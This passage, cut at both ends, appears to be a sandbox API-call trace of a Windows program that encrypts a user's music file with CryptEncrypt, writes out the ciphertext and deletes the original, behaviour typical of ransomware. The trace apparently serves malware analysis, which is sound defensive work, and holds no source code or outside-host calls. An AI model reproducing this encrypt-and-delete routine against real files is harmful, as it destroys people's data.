(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.854] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.855] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.855] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0113.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0113.856] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.856] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x8156, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x8160) returned 1 [0113.857] CharLowerBuffW (in: lpsz="byte[33121]", cchLength=0xb | out: lpsz="byte[33121]") returned 0xb [0113.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.857] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452e430*, pdwDataLen=0x144e2e0*=0x8156, dwBufLen=0x8160 | out: pbData=0x452e430*, pdwDataLen=0x144e2e0*=0x8160) returned 1 [0113.857] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.857] WriteFile (in: hFile=0x298, lpBuffer=0x451e178*, nNumberOfBytesToWrite=0x8160, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x451e178*, lpNumberOfBytesWritten=0x144ece4*=0x8160, lpOverlapped=0x0) returned 1 [0113.859] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.859] CryptDestroyKey (hKey=0x41ac000) returned 1 [0113.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.860] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.860] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0113.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.860] FreeLibrary (hLibModule=0x756e0000) returned 1 [0113.860] CloseHandle (hObject=0x258) returned 1 [0113.860] CloseHandle (hObject=0x298) returned 1 [0113.862] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3", lpFilePart=0x0) returned 0x34 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0113.862] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\wc8lukbji.mp3")) returned 0x20 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0113.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0113.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0113.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0113.863] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab951be0, ftCreationTime.dwHighDateTime=0x1d5eb73, ftLastAccessTime.dwLowDateTime=0xf77c4470, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0xf77c4470, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x8156, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WC8LUkBjI.mp3", cAlternateFileName="WC8LUK~1.MP3")) returned 0x41ac600 [0113.863] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\wc8lukbji.mp3")) returned 1 [0113.864] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab951be0, ftCreationTime.dwHighDateTime=0x1d5eb73, ftLastAccessTime.dwLowDateTime=0xf77c4470, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0xf77c4470, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x8156, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WC8LUkBjI.mp3", cAlternateFileName="WC8LUK~1.MP3")) returned 0 [0113.864] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0113.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0113.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0113.865] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0113.865] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0113.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0113.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0113.865] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0113.866] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0113.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0113.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0113.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.867] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0113.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0113.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 